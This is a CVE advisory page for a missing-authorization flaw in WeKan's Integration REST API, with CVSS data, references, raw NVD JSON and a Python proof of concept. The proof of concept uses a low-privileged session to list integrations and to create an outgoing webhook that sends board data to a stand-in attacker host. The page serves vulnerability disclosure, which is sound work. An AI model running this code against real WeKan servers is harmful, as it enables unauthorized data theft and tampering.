CVE-2026-41454

Description

WeKan before 8.35 contains a missing authorization vulnerability in the Integration REST API endpoints that allows authenticated board members to perform administrative actions without proper privilege verification. Attackers can enumerate integrations including webhook URLs, create new integrations, modify or delete existing integrations, and manage integration activities by exploiting insufficient authorization checks in the JsonRoutes REST handlers.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

WeKan < 8.35

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://target-wekan-instance.com/api/integrations"

# Attacker's session cookie (obtained after logging in as a low-privileged board member)
session_cookie = {
    "wekan-sid": "valid_low_privileged_session_id"
}

# 1. Enumerate existing integrations (Information Disclosure)
def enumerate_integrations():
    response = requests.get(target_url, cookies=session_cookie)
    if response.status_code == 200:
        print("[+] Successfully enumerated integrations:")
        print(response.json())
    else:
        print("[-] Failed to enumerate integrations.")

# 2. Create a malicious integration (Integrity Impact)
def create_malicious_integration():
    payload = {
        "type": "outgoing-webhook",
        "url": "http://attacker-controlled.com/steal",
        "boardId": "target_board_id"
    }
    # Note: The endpoint might vary based on the specific JsonRoutes implementation
    create_url = target_url 
    response = requests.post(create_url, json=payload, cookies=session_cookie)
    if response.status_code == 200:
        print("[+] Successfully created malicious integration.")
    else:
        print(f"[-] Failed to create integration. Status: {response.status_code}")

if __name__ == "__main__":
    enumerate_integrations()
    create_malicious_integration()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41454
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41454
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41454/
[4] VulDB https://vuldb.com/cve/CVE-2026-41454
[5] https://github.com/wekan/wekan/commit/2cd702f48df2b8aef0e7381685f8e089986a18a4
[6] https://github.com/wekan/wekan/releases/tag/v8.35
[7] https://www.vulncheck.com/advisories/wekan-missing-authorization-via-integration-rest-api

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41454", "sourceIdentifier": "[email protected]", "published": "2026-04-22T22:16:32.497", "lastModified": "2026-04-23T16:27:11.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeKan before 8.35 contains a missing authorization vulnerability in the Integration REST API endpoints that allows authenticated board members to perform administrative actions without proper privilege verification. Attackers can enumerate integrations including webhook URLs, create new integrations, modify or delete existing integrations, and manage integration activities by exploiting insufficient authorization checks in the JsonRoutes REST handlers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/wekan/wekan/commit/2cd702f48df2b8aef0e7381685f8e089986a18a4", "source": "[email protected]"}, {"url": "https://github.com/wekan/wekan/releases/tag/v8.35", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wekan-missing-authorization-via-integration-rest-api", "source": "[email protected]"}]}}